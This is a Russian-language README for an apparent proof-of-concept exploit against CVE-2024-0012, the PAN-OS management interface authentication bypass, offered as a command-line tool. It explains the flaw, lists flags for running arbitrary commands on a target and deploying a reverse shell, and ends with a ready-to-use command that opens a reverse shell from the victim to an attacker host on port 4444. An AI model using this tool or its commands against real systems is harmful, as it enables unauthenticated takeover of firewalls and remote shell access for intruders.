
CVE-2024-0012 PAN-OS: Обход аутентификации в веб-интерфейсе управления (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 — это обход аутентификации в программном обеспечении Palo Alto Networks PAN-OS, который позволяет неаутентифицированному злоумышленнику, имеющему сетевой доступ к веб-интерфейсу управления, получить привилегии администратора PAN-OS для выполнения административных действий, вмешательства в конфигурацию или эксплуатации других уязвимостей повышения привилегий с аутентификацией.

| ❗ Отказ от ответственности |
|---|
| Этот проект в первую очередь предназначен для использования в качестве отдельного CLI-инструмента. Запуск этого эксплойта в качестве сервиса может представлять угрозу безопасности. Рекомендуется использовать с осторожностью и дополнительными мерами безопасности. DWYOR |
python3 cve-2024-0012.py -h
Это отобразит справку по инструменту. Вот все поддерживаемые параметры.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
Команда обратной оболочки.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444